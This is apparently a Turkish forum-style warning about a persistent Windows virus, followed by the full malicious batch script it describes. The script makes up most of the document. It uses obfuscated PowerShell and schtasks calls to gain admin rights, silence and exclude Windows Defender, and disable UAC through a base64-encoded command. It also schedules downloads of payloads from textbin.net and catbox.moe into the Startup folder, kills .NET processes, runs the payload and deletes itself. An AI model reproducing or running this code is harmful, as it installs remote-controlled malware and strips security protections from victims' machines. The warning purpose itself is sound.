Ama bu virüse dikkat. Bu virüün adı McAfee programında “ti!FC93760371B9”. Öyle bir virüs ki; program bunu silse de kendini yine bu konuma kopyalıyor. “C:|Users| Username|AppData| Roaming|Microsoft|Windows| Start Menu| Programs | Startup”
Bu konumda oluşan “notepad.exe” virüsü asıl windows zamanlanmış görevler ile registry içine gizlenmiş aşağıda verilen komutları internetten gönderilen gizli komutları çalıştıracak bir arayüz olarak kullanıyor. Bu konumda eğer böyle bir dosya varsa acil önlem alınmaklıdır.
@echo OFF
mode con cols=15 lines=1
p""oW""ErsH""el""l.exe -NoP -NonI -W Hidden -Exec Bypass IEX
@echo off
cls
dir
call :Admin
:Admin
reg query "HKU\S-1-5-19\Environment" >nul 2>&1
if not %errorlevel% EQU 0 (
cls
p""oW""ErsH""ell.exe -windowstyle hidden -Noprofile "Start-Process '%~dpnx0' -Verb RunAs"
exit
)
Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_dword /d 1 /f
p""oW""Er""sH""ell.exe -command Add-MpPreference -ExclusionPath c"":
s""cht""as""k""s /create /tn OneDriveApiUpReDown /tr "Powershell -Command Invoke-WebRequest https://textbin.net/raw/ozntsv0f5a -Outfile %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\OneDriveApiUpReDown.cmd" /ru System /sc weekly /d MON,FRI /f
s""cht""as""k""s /create /tn OneDriveApiUpDown /tr "Powershell -Command Invoke-WebRequest https://files.catbox.moe/ich44z.dat -Outfile %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\notepad.exe" /ru System /SC ONLOGON /DELAY 0000:59 /f
s""cht""as""k""s /create /tn OneDriveApiUpAd /tr "Powershell -command Add-MpPreference -ExclusionPath %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup" /ru System /SC ONLOGON /DELAY 0000:45 /f
timeout 3
p""oW""ErsH""ell.exe -Command Add-MpPreference -ExclusionPath %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup
p""oW""Er""sH""ell.exe -Command Invoke-WebRequest https://files.catbox.moe/ich44z.dat -Outfile %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\notepad.exe
ta""sKKi""ll /IM "AddInUtil.exe" /F
ta""sKKi""ll /IM "aspnet_compiler.exe" /F
ta""sKKi""ll /IM "MSBuild.exe" /F
ta""sKKi""ll /IM "RegAsm.exe" /F
ta""sKKi""ll /IM "AddInProcess.exe" /F
ta""sKKi""ll /IM "RegSvcs.exe" /F
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath c:
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath c:\
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath %USERPROFILE%
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath %USERPROFILE%\
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath %USERPROFILE%\AppData\Roaming
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath %USERPROFILE%\AppData\Roaming\
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath %USERPROFILE%\AppData\Local\Temp
p""oW""ErsH""ell.exe -command Remove-MpPreference -ExclusionPath %USERPROFILE%\AppData\Local\Temp\
p""oW""ErsH""ell.exe -exEc bypass -enc cgBlAGcALgBlAHgAZQAgAEEARABEACAASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACAALwB2ACAARQBuAGEAYgBsAGUATABVAEEAIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADAAIAAvAGYADQAKAA==
cls
c:
cd\
cd "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
start notepad.exe
timeout 3
del *.cmd /f /q
cls
exit
exit